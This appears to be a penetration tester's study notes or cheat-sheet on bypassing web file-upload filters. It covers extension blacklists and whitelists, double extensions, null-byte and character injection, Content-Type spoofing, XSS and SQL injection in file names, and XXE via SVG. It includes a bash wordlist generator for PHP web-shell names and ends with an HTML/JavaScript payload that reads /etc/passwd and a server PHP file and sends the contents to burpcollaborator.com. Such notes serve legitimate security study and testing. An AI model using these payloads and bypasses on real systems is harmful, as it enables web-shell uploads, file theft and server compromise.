Tip: You may also do the same to remove accept=".jpg,.jpeg,.png", which should make selecting the PHP shell easier in the file selection dialog, though this is not mandatory, as mentioned earlier.
Blacklist Filters
Blacklisting Extensions
Tip: The comparison above is also case-sensitive, and is only considering lowercase extensions. In Windows Servers, file names are case insensitive, so we may try uploading a php with a mixed-case (e.g. pHp), which may bypass the blacklist as well, and should still execute as a PHP script.
Upload a file, once this request is captured, send it to the Intruder. Click on "Payloads" and select the "Sniper" attack type.
Click the "Positions" tab now, find the filename and "Add §" to the extension. It should look like so:
Use /usr/share/wordlists/dirb/extensions_common.txt
Uncheck url-encoding
Run the attack
Search for Non-Blacklisted Extensions - Look Content Length
Not all extensions will work with all web server configurations, so we may need to try several extensions to get one that successfully executes PHP code.
Other files that should be restricted for most applications:
.bat
.cgi .exe
.htm -> potential XSS
.html -> potential XSS
.jar
.rar
.shtml
.svg -> potential XSS
.swf -> potential XSS
.tar
.zip
.cer -> potential XSS
.hxt -> potential XSS
.stm -> potential XSS
Whitelist Filters
Double Extensions
Rename it
shell.jpg.php
shell.phar.jpeg
exploit%2Ephp
exploit.asp;.jpg or exploit.asp%00.jpg
Fuzz the upload form with This Wordlist to find what extensions are whitelisted by the upload form
Only consider the final file extension, as it uses (^.*\.) to match everything up to the last (.), and then uses ($) at the end to only match extensions that end the file name
Insecure configuration:
/etc/apache2/mods-enabled/php7.4.conf
shell.php.jpg should pass the earlier whitelist test as it ends with (.jpg), and it would be able to execute PHP code due to the above misconfiguration, as it contains (.php) in its name.
The web application may still utilize a blacklist to deny requests containing PHP extensions. Try to fuzz the upload form with the PHP Wordlist to find what extensions are blacklisted by the upload form.
4️⃣ Change the Content-Type to `application/x-httpd-php`.
5️⃣ Upload succeeds, and the file gets executed as PHP!
Capitalize the file extension
Obfuscationg file extension
Character Injection
We can inject several characters before or after the final extension to cause the web application to misinterpret the filename and execute the uploaded file as a PHP script.
The following are some of the characters we may try injecting:
%20
%0a
%00
%0d0a
/
.\
.
…
:
Null Byte
shell.php%00.jpg works with PHP servers with version 5.X or earlier
Windows server: injecting a colon (:) before the allowed file extension (e.g. shell.aspx:.jpg), which should also write the file as (shell.aspx)
Only images are allowed - reduces the wordlist to 45 types only (compared to around 700 originally):
Intercept our upload request and change the Content-Type header to it:
Also try with:
Note: A file upload HTTP request has two Content-Type headers, one for the attached file (at the bottom), and one for the full request (at the top). We usually need to modify the file's Content-Type header, but in some cases the request will only contain the main Content-Type header (e.g. if the uploaded content was sent as POST data), in which case we will need to modify the main Content-Type header.
XML data is not unique to SVG images, as it is also utilized by many types of documents, like PDF, Word Documents, PowerPoint Documents, among many others.
XXE vulnerability to enumerate the internally available services or even call private APIs to perform private actions
XSS payload in the file name (e.g. <script>alert(window.origin);</script>), which would get executed on the target's machine if the file name is displayed to them. We may also inject an SQL query in the file name (e.g. file';select+sleep(5);--.jpg), which may lead to an SQL injection if the file name is insecurely used in an SQL query.
Upload and visit the file. You will receive an email with the real IP. Try to access the server using the real IP. If it works, you can bypass WAF, CDN, etc.
If appropriate defenses aren't in place, this can provide an alternative means of uploading malicious files, even when an upload function isn't available via the web interface.
#!/bin/bash
# List of characters
chars=('%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':')
# List of extensions
extensions=('.php' '.phps' '.phar' '.php8')
# Create or clear the wordlist file
> wordlist.txt
# Loop through each character
for char in "${chars[@]}"; do
# Loop through each extension
for ext in "${extensions[@]}"; do
echo "shell$char$ext.jpg" >> wordlist.txt
echo "shell$ext$char.jpg" >> wordlist.txt
echo "shell.jpg$char$ext" >> wordlist.txt
echo "shell.jpg$ext$char" >> wordlist.txt
done
done
<html>
<body>
<b>Exfiltration via Blind SSRF</b>
<iframe src="file:///etc/passwd"></iframe>
<script>
var readfile = new XMLHttpRequest(); // Read the local file
var exfil = new XMLHttpRequest(); // Send the file to our server
readfile.open("GET","file:///var/www/html/dev-text.php", true);
readfile.send();
readfile.onload = function() {
if (readfile.readyState === 4) {
var url = 'http://burpcollaborator.com?data='+btoa(this.response);
exfil.open("GET", url, true);
exfil.send();
}
}
readfile.onerror = function(){document.write('<a>Oops!</a>');}
</script>
</body>
</html>
